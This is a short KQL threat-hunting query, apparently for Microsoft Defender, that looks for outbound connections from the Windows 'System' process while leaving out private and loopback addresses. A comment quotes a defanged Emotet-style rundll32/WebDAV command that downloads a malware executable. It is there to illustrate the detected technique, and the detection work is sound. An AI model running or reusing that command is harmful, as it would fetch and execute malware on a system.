// System creating network connections could be many things
// A common TTP associated with this traffic is exploiting WebDAV to download malware
// emotet example:
// rundll32.exe C:\windows\system32\davclnt.dll,DavSetCookie 127.0.0.1 hxxp://127.0.0[.]1/$/users/public/malware[.]exe
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "System"
| where ActionType == "ConnectionSuccess"
// exclude local IPs
| where not(ipv4_is_private(RemoteIP))  // ABC private ranges
| where RemoteIP !startswith "169.254." // DHCP failed, default link-local
| where RemoteIP !startswith "127."     // loopback
| where RemoteIP != "::1"               // loopback
// other exclusions
//| where RemoteIP !startswith "X.X." // Your org's public IPs